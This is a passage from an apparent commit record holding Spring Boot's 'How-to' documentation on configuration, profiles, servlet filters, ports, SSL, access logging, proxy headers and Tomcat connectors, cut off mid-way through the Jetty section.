pring-boot,jxblum\/spring-boot,mdeinum\/spring-boot,dreis2211\/spring-boot,philwebb\/spring-boot,vpavic\/spring-boot,shakuzen\/spring-boot,donhuvy\/spring-boot,htynkn\/spring-boot,eddumelendez\/spring-boot,hello2009chen\/spring-boot,drumonii\/spring-boot,aahlenst\/spring-boot,htynkn\/spring-boot,felipeg48\/spring-boot,vpavic\/spring-boot,vpavic\/spring-boot,eddumelendez\/spring-boot,spring-projects\/spring-boot,drumonii\/spring-boot,scottfrederick\/spring-boot,drumonii\/spring-boot,mbenson\/spring-boot,tsachev\/spring-boot,ilayaperumalg\/spring-boot,philwebb\/spring-boot,philwebb\/spring-boot,joshiste\/spring-boot,mdeinum\/spring-boot,aahlenst\/spring-boot,aahlenst\/spring-boot,hello2009chen\/spring-boot,drumonii\/spring-boot,tiarebalbi\/spring-boot,kdvolder\/spring-boot,rweisleder\/spring-boot,vpavic\/spring-boot,kdvolder\/spring-boot,tsachev\/spring-boot,hello2009chen\/spring-boot,chrylis\/spring-boot,dreis2211\/spring-boot,ptahchiev\/spring-boot,mdeinum\/spring-boot,eddumelendez\/spring-boot,ilayaperumalg\/spring-boot,tiarebalbi\/spring-boot,NetoDevel\/spring-boot,donhuvy\/spring-boot,tsachev\/spring-boot,ptahchiev\/spring-boot,wilkinsona\/spring-boot,vpavic\/spring-boot,donhuvy\/spring-boot,michael-simons\/spring-boot,yangdd1205\/spring-boot,shakuzen\/spring-boot,rweisleder\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/howto.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/howto.adoc","new_contents":"[[howto]]\n= '`How-to`' guides\n\n[partintro]\n--\nThis section provides answers to some common '`how do I do that...`' type of questions\nthat often arise when using Spring Boot. This is by no means an exhaustive list, but it\ndoes cover quite a lot.\n\nIf you are having a specific problem that we don't cover here, you might want to check out\nhttp:\/\/stackoverflow.com\/tags\/spring-boot[stackoverflow.com] to see if someone has\nalready provided an answer; this is also a great place to ask new questions (please use\nthe `spring-boot` tag).\n\nWe're also more than happy to extend this section; If you want to add a '`how-to`' you\ncan send us a {github-code}[pull request].\n--\n\n\n\n[[howto-spring-boot-application]]\n== Spring Boot application\n\n\n[[howto-failure-analyzer]]\n=== Create your own FailureAnalyzer\n{dc-spring-boot}\/diagnostics\/FailureAnalyzer.{dc-ext}[`FailureAnalyzer`] is a great way\nto intercept an exception on startup and turn it into a human-readable message, wrapped\ninto a {dc-spring-boot}\/diagnostics\/FailureAnalysis.{dc-ext}[`FailureAnalysis`]. Spring\nBoot provides such analyzer for application context related exceptions, JSR-303\nvalidations and more. It is actually very easy to create your own.\n\n`AbstractFailureAnalyzer` is a convenient extension of `FailureAnalyzer` that checks the\npresence of a specified exception type in the exception to handle. You can extend from\nthat so that your implementation gets a chance to handle the exception only when it is\nactually present. If for whatever reason you can't handle the exception, return `null`\nto give another implementation a chance to handle the exception.\n\n`FailureAnalyzer` implementations are to be registered in a `META-INF\/spring.factories`:\nthe following registers `ProjectConstraintViolationFailureAnalyzer`:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.diagnostics.FailureAnalyzer=\\\n\tcom.example.ProjectConstraintViolationFailureAnalyzer\n----\n\n\n\n[[howto-troubleshoot-auto-configuration]]\n=== Troubleshoot auto-configuration\nThe Spring Boot auto-configuration tries its best to '`do the right thing`', but\nsometimes things fail and it can be hard to tell why.\n\nThere is a really useful `ConditionEvaluationReport` available in any Spring Boot\n`ApplicationContext`. You will see it if you enable `DEBUG` logging output. If you use\nthe `spring-boot-actuator` there is also an `autoconfig` endpoint that renders the report\nin JSON. Use that to debug the application and see what features have been added (and\nwhich not) by Spring Boot at runtime.\n\nMany more questions can be answered by looking at the source code and the Javadoc. Some\nrules of thumb:\n\n* Look for classes called `+*AutoConfiguration+` and read their sources, in particular the\n `+@Conditional*+` annotations to find out what features they enable and when. Add\n `--debug` to the command line or a System property `-Ddebug` to get a log on the\n console of all the auto-configuration decisions that were made in your app. In a running\n Actuator app look at the `autoconfig` endpoint ('`\/autoconfig`' or the JMX equivalent) for\n the same information.\n* Look for classes that are `@ConfigurationProperties` (e.g.\n {sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`])\n and read from there the available external configuration options. The\n `@ConfigurationProperties` has a `name` attribute which acts as a prefix to external\n properties, thus `ServerProperties` has `prefix=\"server\"` and its configuration properties\n are `server.port`, `server.address` etc. In a running Actuator app look at the\n `configprops` endpoint.\n* Look for use of `RelaxedPropertyResolver` to pull configuration values explicitly out of the\n `Environment`. It often is used with a prefix.\n* Look for `@Value` annotations that bind directly to the `Environment`. This is less\n flexible than the `RelaxedPropertyResolver` approach, but does allow some relaxed binding,\n specifically for OS environment variables (so `CAPITALS_AND_UNDERSCORES` are synonyms\n for `period.separated`).\n* Look for `@ConditionalOnExpression` annotations that switch features on and off in\n response to SpEL expressions, normally evaluated with placeholders resolved from the\n `Environment`.\n\n\n\n[[howto-customize-the-environment-or-application-context]]\n=== Customize the Environment or ApplicationContext before it starts\nA `SpringApplication` has `ApplicationListeners` and `ApplicationContextInitializers` that\nare used to apply customizations to the context or environment. Spring Boot loads a number\nof such customizations for use internally from `META-INF\/spring.factories`. There is more\nthan one way to register additional ones:\n\n* Programmatically per application by calling the `addListeners` and `addInitializers`\n methods on `SpringApplication` before you run it.\n* Declaratively per application by setting `context.initializer.classes` or\n `context.listener.classes`.\n* Declaratively for all applications by adding a `META-INF\/spring.factories` and packaging\n a jar file that the applications all use as a library.\n\nThe `SpringApplication` sends some special `ApplicationEvents` to the listeners (even\nsome before the context is created), and then registers the listeners for events published\nby the `ApplicationContext` as well. See\n_<<spring-boot-features.adoc#boot-features-application-events-and-listeners>>_ in the\n'`Spring Boot features`' section for a complete list.\n\nIt is also possible to customize the `Environment` before the application context is\nrefreshed using `EnvironmentPostProcessor`. Each implementation should be registered in\n`META-INF\/spring.factories`:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.env.EnvironmentPostProcessor=com.example.YourEnvironmentPostProcessor\n----\n\nThe implementation can load arbitrary files and add them to the `Environment`. For\ninstance, this example loads a YAML configuration file from the classpath:\n\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/context\/EnvironmentPostProcessorExample.java[tag=example]\n----\n\nTIP: The `Environment` will already have been prepared with all the usual property sources\nthat Spring Boot loads by default. It is therefore possible to get the location of the\nfile from the environment. This example adds the `custom-resource` property source at the\nend of the list so that a key defined in any of the usual other locations takes\nprecedence. A custom implementation may obviously defines another order.\n\nNOTE: While using `@PropertySource` on your `@SpringBootApplication` seems convenient and\neasy enough to load a custom resource in the `Environment`, we do not recommend it as\nSpring Boot prepares the `Environment` before the `ApplicationContext` is refreshed. Any\nkey defined via `@PropertySource` will be loaded too late to have any effect on\nauto-configuration.\n\n\n\n[[howto-build-an-application-context-hierarchy]]\n=== Build an ApplicationContext hierarchy (adding a parent or root context)\nYou can use the `ApplicationBuilder` class to create parent\/child `ApplicationContext`\nhierarchies. See _<<spring-boot-features.adoc#boot-features-fluent-builder-api>>_\nin the '`Spring Boot features`' section for more information.\n\n\n\n[[howto-create-a-non-web-application]]\n=== Create a non-web application\nNot all Spring applications have to be web applications (or web services). If you want to\nexecute some code in a `main` method, but also bootstrap a Spring application to set up\nthe infrastructure to use, then it's easy with the `SpringApplication` features of Spring\nBoot. A `SpringApplication` changes its `ApplicationContext` class depending on whether it\nthinks it needs a web application or not. The first thing you can do to help it is to just\nleave the servlet API dependencies off the classpath. If you can't do that (e.g. you are\nrunning 2 applications from the same code base) then you can explicitly call\n`setWebEnvironment(false)` on your `SpringApplication` instance, or set the\n`applicationContextClass` property (through the Java API or with external properties).\nApplication code that you want to run as your business logic can be implemented as a\n`CommandLineRunner` and dropped into the context as a `@Bean` definition.\n\n\n\n[[howto-properties-and-configuration]]\n== Properties & configuration\n\n\n\n[[howto-automatic-expansion]]\n=== Automatically expand properties at build time\nRather than hardcoding some properties that are also specified in your project's build\nconfiguration, you can automatically expand them using the existing build configuration\ninstead. This is possible in both Maven and Gradle.\n\n\n\n[[howto-automatic-expansion-maven]]\n==== Automatic property expansion using Maven\nYou can automatically expand properties from the Maven project using resource\nfiltering. If you use the `spring-boot-starter-parent` you can then refer to your\nMaven '`project properties`' via `@..@` placeholders, e.g.\n\n[source,properties,indent=0]\n----\n\tapp.encoding=@project.build.sourceEncoding@\n\tapp.java.version=@java.version@\n----\n\nNOTE: Only production configuration is filtered that way (i.e. no filtering is applied on\n`src\/test\/resources`).\n\nTIP: The `spring-boot:run` can add `src\/main\/resources` directly to the classpath\n(for hot reloading purposes) if you enable the `addResources` flag. This circumvents\nthe resource filtering and this feature. You can use the `exec:java` goal instead\nor customize the plugin's configuration, see the\n{spring-boot-maven-plugin-site}\/usage.html[plugin usage page] for more details.\n\nIf you don't use the starter parent, in your `pom.xml` you need (inside the `<build\/>`\nelement):\n\n[source,xml,indent=0]\n----\n\t<resources>\n\t\t<resource>\n\t\t\t<directory>src\/main\/resources<\/directory>\n\t\t\t<filtering>true<\/filtering>\n\t\t<\/resource>\n\t<\/resources>\n----\n\nand (inside `<plugins\/>`):\n\n[source,xml,indent=0]\n----\n\t<plugin>\n\t\t<groupId>org.apache.maven.plugins<\/groupId>\n\t\t<artifactId>maven-resources-plugin<\/artifactId>\n\t\t<version>2.7<\/version>\n\t\t<configuration>\n\t\t\t<delimiters>\n\t\t\t\t<delimiter>@<\/delimiter>\n\t\t\t<\/delimiters>\n\t\t\t<useDefaultDelimiters>false<\/useDefaultDelimiters>\n\t\t<\/configuration>\n\t<\/plugin>\n----\n\nNOTE: The `useDefaultDelimiters` property is important if you are using standard Spring\nplaceholders in your configuration (e.g. `${foo}`). These may be expanded by the build if\nthat property is not set to `false`.\n\n\n\n[[howto-automatic-expansion-gradle]]\n==== Automatic property expansion using Gradle\nYou can automatically expand properties from the Gradle project by configuring the\nJava plugin's `processResources` task to do so:\n\n[source,groovy,indent=0]\n----\n\tprocessResources {\n\t\texpand(project.properties)\n\t}\n----\n\nYou can then refer to your Gradle project's properties via placeholders, e.g.\n\n[source,properties,indent=0]\n----\n\tapp.name=${name}\n\tapp.description=${description}\n----\n\nNOTE: Gradle's `expand` method uses Groovy's `SimpleTemplateEngine` which transforms\n`${..}` tokens. The `${..}` style conflicts with Spring's own property placeholder\nmechanism. To use Spring property placeholders together with automatic expansion\nthe Spring property placeholders need to be escaped like `\\${..}`.\n\n\n\n\n[[howto-externalize-configuration]]\n=== Externalize the configuration of SpringApplication\nA `SpringApplication` has bean properties (mainly setters) so you can use its Java API as\nyou create the application to modify its behavior. Or you can externalize the\nconfiguration using properties in `+spring.main.*+`. E.g. in `application.properties` you\nmight have.\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.main.web-environment=false\n\tspring.main.banner-mode=off\n----\n\nand then the Spring Boot banner will not be printed on startup, and the application will\nnot be a web application.\n\nNOTE: The example above also demonstrates how flexible binding allows the use of\nunderscores (`_`) as well as dashes (`-`) in property names.\n\nProperties defined in external configuration overrides the values specified via the Java\nAPI with the notable exception of the sources used to create the `ApplicationContext`. Let's\nconsider this application\n\n[source,java,indent=0]\n----\n\tnew SpringApplicationBuilder()\n\t\t.bannerMode(Banner.Mode.OFF)\n\t\t.sources(demo.MyApp.class)\n\t\t.run(args);\n----\n\nused with the following configuration:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.main.sources=com.acme.Config,com.acme.ExtraConfig\n\tspring.main.banner-mode=console\n----\n\nThe actual application will _now_ show the banner (as overridden by configuration) and use\nthree sources for the `ApplicationContext` (in that order): `demo.MyApp`, `com.acme.Config`,\n`com.acme.ExtraConfig`.\n\n\n\n[[howto-change-the-location-of-external-properties]]\n=== Change the location of external properties of an application\nBy default properties from different sources are added to the Spring `Environment` in a\ndefined order (see _<<spring-boot-features.adoc#boot-features-external-config>>_ in\nthe '`Spring Boot features`' section for the exact order).\n\nA nice way to augment and modify this is to add `@PropertySource` annotations to your\napplication sources. Classes passed to the `SpringApplication` static convenience\nmethods, and those added using `setSources()` are inspected to see if they have\n`@PropertySources`, and if they do, those properties are added to the `Environment` early\nenough to be used in all phases of the `ApplicationContext` lifecycle. Properties added\nin this way have lower\npriority than any added using the default locations (e.g. `application.properties`), system properties, environment variables or the command line.\n\nYou can also provide System properties (or environment variables) to change the behavior:\n\n* `spring.config.name` (`SPRING_CONFIG_NAME`), defaults to `application` as the root of\n the file name.\n* `spring.config.location` (`SPRING_CONFIG_LOCATION`) is the file to load (e.g. a classpath\n resource or a URL). A separate `Environment` property source is set up for this document\n and it can be overridden by system properties, environment variables or the\n command line.\n\nNo matter what you set in the environment, Spring Boot will always load\n`application.properties` as described above. If YAML is used then files with the '`.yml`'\nextension are also added to the list by default.\n\nSpring Boot logs the configuration files that are loaded at `DEBUG` level and the\ncandidates it has not found at `TRACE` level.\n\nSee {sc-spring-boot}\/context\/config\/ConfigFileApplicationListener.{sc-ext}[`ConfigFileApplicationListener`]\nfor more detail.\n\n\n\n[[howto-use-short-command-line-arguments]]\n=== Use '`short`' command line arguments\nSome people like to use (for example) `--port=9000` instead of `--server.port=9000` to\nset configuration properties on the command line. You can easily enable this by using\nplaceholders in `application.properties`, e.g.\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.port=${port:8080}\n----\n\nTIP: If you are inheriting from the `spring-boot-starter-parent` POM, the default filter\ntoken of the `maven-resources-plugins` has been changed from `+${*}+` to `@` (i.e.\n`@maven.token@` instead of `${maven.token}`) to prevent conflicts with Spring-style\nplaceholders. If you have enabled maven filtering for the `application.properties`\ndirectly, you may want to also change the default filter token to use\nhttp:\/\/maven.apache.org\/plugins\/maven-resources-plugin\/resources-mojo.html#delimiters[other delimiters].\n\nNOTE: In this specific case the port binding will work in a PaaS environment like Heroku\nand Cloud Foundry, since in those two platforms the `PORT` environment variable is set\nautomatically and Spring can bind to capitalized synonyms for `Environment` properties.\n\n\n\n[[howto-use-yaml-for-external-properties]]\n=== Use YAML for external properties\nYAML is a superset of JSON and as such is a very convenient syntax for storing external\nproperties in a hierarchical format. E.g.\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring:\n\t\tapplication:\n\t\t\tname: cruncher\n\t\tdatasource:\n\t\t\tdriverClassName: com.mysql.jdbc.Driver\n\t\t\turl: jdbc:mysql:\/\/localhost\/test\n\tserver:\n\t\tport: 9000\n----\n\nCreate a file called `application.yml` and stick it in the root of your classpath, and\nalso add `snakeyaml` to your dependencies (Maven coordinates `org.yaml:snakeyaml`, already\nincluded if you use the `spring-boot-starter`). A YAML file is parsed to a Java\n`Map<String,Object>` (like a JSON object), and Spring Boot flattens the map so that it\nis 1-level deep and has period-separated keys, a lot like people are used to with\n`Properties` files in Java.\n\nThe example YAML above corresponds to an `application.properties` file\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.application.name=cruncher\n\tspring.datasource.driverClassName=com.mysql.jdbc.Driver\n\tspring.datasource.url=jdbc:mysql:\/\/localhost\/test\n\tserver.port=9000\n----\n\nSee _<<spring-boot-features.adoc#boot-features-external-config-yaml>>_ in\nthe '`Spring Boot features`' section for more information\nabout YAML.\n\n[[howto-set-active-spring-profiles]]\n=== Set the active Spring profiles\nThe Spring `Environment` has an API for this, but normally you would set a System property\n(`spring.profiles.active`) or an OS environment variable (`SPRING_PROFILES_ACTIVE`). E.g.\nlaunch your application with a `-D` argument (remember to put it before the main class\nor jar archive):\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ java -jar -Dspring.profiles.active=production demo-0.0.1-SNAPSHOT.jar\n----\n\nIn Spring Boot you can also set the active profile in `application.properties`, e.g.\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.profiles.active=production\n----\n\nA value set this way is replaced by the System property or environment variable setting,\nbut not by the `SpringApplicationBuilder.profiles()` method. Thus the latter Java API can\nbe used to augment the profiles without changing the defaults.\n\nSee _<<spring-boot-features.adoc#boot-features-profiles>>_ in\nthe '`Spring Boot features`' section for more information.\n\n\n\n[[howto-change-configuration-depending-on-the-environment]]\n=== Change configuration depending on the environment\nA YAML file is actually a sequence of documents separated by `---` lines, and each\ndocument is parsed separately to a flattened map.\n\nIf a YAML document contains a `spring.profiles` key, then the profiles value\n(comma-separated list of profiles) is fed into the Spring\n`Environment.acceptsProfiles()` and if any of those profiles is active that document is\nincluded in the final merge (otherwise not).\n\nExample:\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver:\n\t\tport: 9000\n\t---\n\n\tspring:\n\t\tprofiles: development\n\tserver:\n\t\tport: 9001\n\n\t---\n\n\tspring:\n\t\tprofiles: production\n\tserver:\n\t\tport: 0\n----\n\nIn this example the default port is 9000, but if the Spring profile '`development`' is\nactive then the port is 9001, and if '`production`' is active then it is 0.\n\nThe YAML documents are merged in the order they are encountered (so later values override\nearlier ones).\n\nTo do the same thing with properties files you can use `application-${profile}.properties`\nto specify profile-specific values.\n\n\n\n[[howto-discover-build-in-options-for-external-properties]]\n=== Discover built-in options for external properties\nSpring Boot binds external properties from `application.properties` (or `.yml`) (and\nother places) into an application at runtime. There is not (and technically cannot be)\nan exhaustive list of all supported properties in a single location because contributions\ncan come from additional jar files on your classpath.\n\nA running application with the Actuator features has a `configprops` endpoint that shows\nall the bound and bindable properties available through `@ConfigurationProperties`.\n\nThe appendix includes an <<appendix-application-properties#common-application-properties,\n`application.properties`>> example with a list of the most common properties supported by\nSpring Boot. The definitive list comes from searching the source code for\n`@ConfigurationProperties` and `@Value` annotations, as well as the occasional use of\n`RelaxedPropertyResolver`.\n\n\n\n[[howto-embedded-servlet-containers]]\n== Embedded servlet containers\n\n\n\n[[howto-add-a-servlet-filter-or-listener]]\n=== Add a Servlet, Filter or Listener to an application\nThere are two ways to add `Servlet`, `Filter`, `ServletContextListener` and the other\nlisteners supported by the Servlet spec to your application. You can either provide\nSpring beans for them, or enable scanning for Servlet components.\n\n\n\n[[howto-add-a-servlet-filter-or-listener-as-spring-bean]]\n==== Add a Servlet, Filter or Listener using a Spring bean\nTo add a `Servlet`, `Filter`, or Servlet `*Listener` provide a `@Bean` definition for it.\nThis can be very useful when you want to inject configuration or dependencies. However,\nyou must be very careful that they don't cause eager initialization of too many other\nbeans because they have to be installed in the container very early in the application\nlifecycle (e.g. it's not a good idea to have them depend on your `DataSource` or JPA\nconfiguration). You can work around restrictions like that by initializing them lazily\nwhen first used instead of on initialization.\n\nIn the case of `Filters` and `Servlets` you can also add mappings and init parameters by\nadding a `FilterRegistrationBean` or `ServletRegistrationBean` instead of or as well as\nthe underlying component.\n\n[NOTE]\n====\nIf no `dispatcherType` is specified on a filter registration, it will match\n`FORWARD`,`INCLUDE` and `REQUEST`. If async has been enabled, it will match `ASYNC` as\nwell.\n\nIf you are migrating a filter that has no `dispatcher` element in `web.xml` you will\nneed to specify a `dispatcherType` yourself:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic FilterRegistrationBean myFilterRegistration() {\n\t\tFilterRegistrationBean registration = new FilterRegistrationBean();\n\t\tregistration.setDispatcherTypes(DispatcherType.REQUEST);\n\t\t....\n\n\t\treturn registration;\n\t}\n----\n====\n\n\n[[howto-disable-registration-of-a-servlet-or-filter]]\n===== Disable registration of a Servlet or Filter\nAs <<howto-add-a-servlet-filter-or-listener-as-spring-bean,described above>> any `Servlet`\nor `Filter` beans will be registered with the servlet container automatically. To disable\nregistration of a particular `Filter` or `Servlet` bean create a registration bean for it\nand mark it as disabled. For example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic FilterRegistrationBean registration(MyFilter filter) {\n\t\tFilterRegistrationBean registration = new FilterRegistrationBean(filter);\n\t\tregistration.setEnabled(false);\n\t\treturn registration;\n\t}\n----\n\n\n\n[[howto-add-a-servlet-filter-or-listener-using-scanning]]\n==== Add Servlets, Filters, and Listeners using classpath scanning\n`@WebServlet`, `@WebFilter`, and `@WebListener` annotated classes can be automatically\nregistered with an embedded servlet container by annotating a `@Configuration` class\nwith `@ServletComponentScan` and specifying the package(s) containing the components\nthat you want to register. By default, `@ServletComponentScan` will scan from the package\nof the annotated class.\n\n\n\n[[howto-change-the-http-port]]\n=== Change the HTTP port\nIn a standalone application the main HTTP port defaults to `8080`, but can be set with\n`server.port` (e.g. in `application.properties` or as a System property). Thanks to\nrelaxed binding of `Environment` values you can also use `SERVER_PORT` (e.g. as an OS\nenvironment variable).\n\nTo switch off the HTTP endpoints completely, but still create a `WebApplicationContext`,\nuse `server.port=-1` (this is sometimes useful for testing).\n\nFor more details look at _<<spring-boot-features.adoc#boot-features-customizing-embedded-containers>>_\nin the '`Spring Boot features`' section, or the\n{sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`] source\ncode.\n\n\n\n[[howto-user-a-random-unassigned-http-port]]\n=== Use a random unassigned HTTP port\nTo scan for a free port (using OS natives to prevent clashes) use `server.port=0`.\n\n\n\n[[howto-discover-the-http-port-at-runtime]]\n=== Discover the HTTP port at runtime\nYou can access the port the server is running on from log output or from the\n`EmbeddedWebApplicationContext` via its `EmbeddedServletContainer`. The best way to get\nthat and be sure that it has initialized is to add a `@Bean` of type\n`ApplicationListener<EmbeddedServletContainerInitializedEvent>` and pull the container\nout of the event when it is published.\n\nTests that use `@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)` can\nalso inject the actual port into a field using the `@LocalServerPort` annotation. For\nexample:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)\n\tpublic class MyWebIntegrationTests {\n\n\t\t@Autowired\n\t\tEmbeddedWebApplicationContext server;\n\n\t\t@LocalServerPort\n\t\tint port;\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[NOTE]\n====\n`@LocalServerPort` is a meta-annotation for `@Value(\"${local.server.port}\")`. Don't try\nto inject the port in a regular application. As we just saw, the value is only set once\nthe container has initialized; contrary to a test, application code callbacks are\nprocessed early (i.e. before the value is actually available).\n====\n\n\n\n[[howto-configure-ssl]]\n=== Configure SSL\nSSL can be configured declaratively by setting the various `+server.ssl.*+` properties,\ntypically in `application.properties` or `application.yml`. For example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.port=8443\n\tserver.ssl.key-store=classpath:keystore.jks\n\tserver.ssl.key-store-password=secret\n\tserver.ssl.key-password=another-secret\n----\n\nSee {sc-spring-boot}\/context\/embedded\/Ssl.{sc-ext}[`Ssl`] for details of all of the\nsupported properties.\n\nUsing configuration like the example above means the application will no longer support\nplain HTTP connector at port 8080. Spring Boot doesn't support the configuration of both\nan HTTP connector and an HTTPS connector via `application.properties`. If you want to\nhave both then you'll need to configure one of them programmatically. It's recommended\nto use `application.properties` to configure HTTPS as the HTTP connector is the easier of\nthe two to configure programmatically. See the\n{github-code}\/spring-boot-samples\/spring-boot-sample-tomcat-multi-connectors[`spring-boot-sample-tomcat-multi-connectors`]\nsample project for an example.\n\n\n\n[[howto-configure-accesslogs]]\n=== Configure Access Logging\nAccess logs can be configured for Tomcat and Undertow via their respective namespaces.\n\nFor instance, the following logs access on Tomcat with a\nhttps:\/\/tomcat.apache.org\/tomcat-8.0-doc\/config\/valve.html#Access_Logging[custom pattern].\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.tomcat.basedir=my-tomcat\n\tserver.tomcat.accesslog.enabled=true\n\tserver.tomcat.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nNOTE: The default location for logs is a `logs` directory relative to the tomcat base dir\nand said directory is a temp directory by default so you may want to fix Tomcat's base\ndirectory or use an absolute path for the logs. In the example above, the logs will\nbe available in `my-tomcat\/logs` relative to the working directory of the application.\n\nAccess logging for undertow can be configured in a similar fashion\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.undertow.accesslog.enabled=true\n\tserver.undertow.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nLogs are stored in a `logs` directory relative to the working directory of the\napplication. This can be customized via `server.undertow.accesslog.directory`.\n\n\n\n[[howto-use-behind-a-proxy-server]]\n[[howto-use-tomcat-behind-a-proxy-server]]\n=== Use behind a front-end proxy server\nYour application might need to send `302` redirects or render content with absolute links\nback to itself. When running behind a proxy, the caller wants a link to the proxy, and not\nto the physical address of the machine hosting your app. Typically such situations are\nhandled via a contract with the proxy, which will add headers to tell the back end how to\nconstruct links to itself.\n\nIf the proxy adds conventional `X-Forwarded-For` and `X-Forwarded-Proto` headers (most do\nthis out of the box) the absolute links should be rendered correctly as long as\n`server.use-forward-headers` is set to `true` in your `application.properties`.\n\nNOTE: If your application is running in Cloud Foundry or Heroku the\n`server.use-forward-headers` property will default to `true` if not specified. In all\nother instances it defaults to `false`.\n\n\n\n[[howto-customize-tomcat-behind-a-proxy-server]]\n==== Customize Tomcat's proxy configuration\nIf you are using Tomcat you can additionally configure the names of the headers used to\ncarry \"`forwarded`\" information:\n\n[indent=0]\n----\n\tserver.tomcat.remote-ip-header=x-your-remote-ip-header\n\tserver.tomcat.protocol-header=x-your-protocol-header\n----\n\nTomcat is also configured with a default regular expression that matches internal\nproxies that are to be trusted. By default, IP addresses in `10\/8`, `192.168\/16`,\n`169.254\/16` and `127\/8` are trusted. You can customize the valve's configuration by\nadding an entry to `application.properties`, e.g.\n\n[indent=0]\n----\n\tserver.tomcat.internal-proxies=192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\n----\n\nNOTE: The double backslashes are only required when you're using a properties file for\nconfiguration. If you are using YAML, single backslashes are sufficient and a value\nthat's equivalent to the one shown above would be `192\\.168\\.\\d{1,3}\\.\\d{1,3}`.\n\nNOTE: You can trust all proxies by setting the `internal-proxies` to empty (but don't do\nthis in production).\n\nYou can take complete control of the configuration of Tomcat's `RemoteIpValve` by\nswitching the automatic one off (i.e. set `server.use-forward-headers=false`) and adding\na new valve instance in a `TomcatEmbeddedServletContainerFactory` bean.\n\n\n\n[[howto-configure-tomcat]]\n=== Configure Tomcat\nGenerally you can follow the advice from\n_<<howto-discover-build-in-options-for-external-properties>>_ about\n`@ConfigurationProperties` (`ServerProperties` is the main one here), but also look at\n`EmbeddedServletContainerCustomizer` and various Tomcat-specific `+*Customizers+` that you\ncan add in one of those. The Tomcat APIs are quite rich so once you have access to the\n`TomcatEmbeddedServletContainerFactory` you can modify it in a number of ways. Or the\nnuclear option is to add your own `TomcatEmbeddedServletContainerFactory`.\n\n\n\n[[howto-enable-multiple-connectors-in-tomcat]]\n=== Enable Multiple Connectors with Tomcat\nAdd a `org.apache.catalina.connector.Connector` to the\n`TomcatEmbeddedServletContainerFactory` which can allow multiple connectors, e.g. HTTP and\nHTTPS connector:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic EmbeddedServletContainerFactory servletContainer() {\n\t\tTomcatEmbeddedServletContainerFactory tomcat = new TomcatEmbeddedServletContainerFactory();\n\t\ttomcat.addAdditionalTomcatConnectors(createSslConnector());\n\t\treturn tomcat;\n\t}\n\n\tprivate Connector createSslConnector() {\n\t\tConnector connector = new Connector(\"org.apache.coyote.http11.Http11NioProtocol\");\n\t\tHttp11NioProtocol protocol = (Http11NioProtocol) connector.getProtocolHandler();\n\t\ttry {\n\t\t\tFile keystore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tFile truststore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tconnector.setScheme(\"https\");\n\t\t\tconnector.setSecure(true);\n\t\t\tconnector.setPort(8443);\n\t\t\tprotocol.setSSLEnabled(true);\n\t\t\tprotocol.setKeystoreFile(keystore.getAbsolutePath());\n\t\t\tprotocol.setKeystorePass(\"changeit\");\n\t\t\tprotocol.setTruststoreFile(truststore.getAbsolutePath());\n\t\t\tprotocol.setTruststorePass(\"changeit\");\n\t\t\tprotocol.setKeyAlias(\"apitester\");\n\t\t\treturn connector;\n\t\t}\n\t\tcatch (IOException ex) {\n\t\t\tthrow new IllegalStateException(\"can't access keystore: [\" + \"keystore\"\n\t\t\t\t\t+ \"] or truststore: [\" + \"keystore\" + \"]\", ex);\n\t\t}\n\t}\n----\n\n\n\n[[howto-use-tomcat-legacycookieprocessor]]\n=== Use Tomcat's LegacyCookieProcessor\nThe embedded Tomcat used by Spring Boot does not support \"Version 0\" of the Cookie\nformat out of the box, and you may see the following error:\n\n[indent=0]\n----\n\tjava.lang.IllegalArgumentException: An invalid character [32] was present in the Cookie value\n----\n\nIf at all possible, you should consider updating your code to only store values\ncompliant with later Cookie specifications. If, however, you're unable to change the\nway that cookies are written, you can instead configure Tomcat to use a\n`LegacyCookieProcessor`. To switch to the `LegacyCookieProcessor` use an\n`EmbeddedServletContainerCustomizer` bean that adds a `TomcatContextCustomizer`:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/context\/embedded\/TomcatLegacyCookieProcessorExample.java[tag=customizer]\n----\n\n\n\n[[howto-use-jetty-instead-of-tomcat]]\n=== Use Jetty instead of Tomcat\nThe Spring Boot starters (`spring-boot-starter-web` in particular) use Tomcat as an\nembedded container by default. You need to exclude those dependencies and include the\nJetty one instead. Spring Boot provides Tomcat and Jetty dependencies bundled together\nas separate starters to help make this process as easy as possible.\n\nExample in 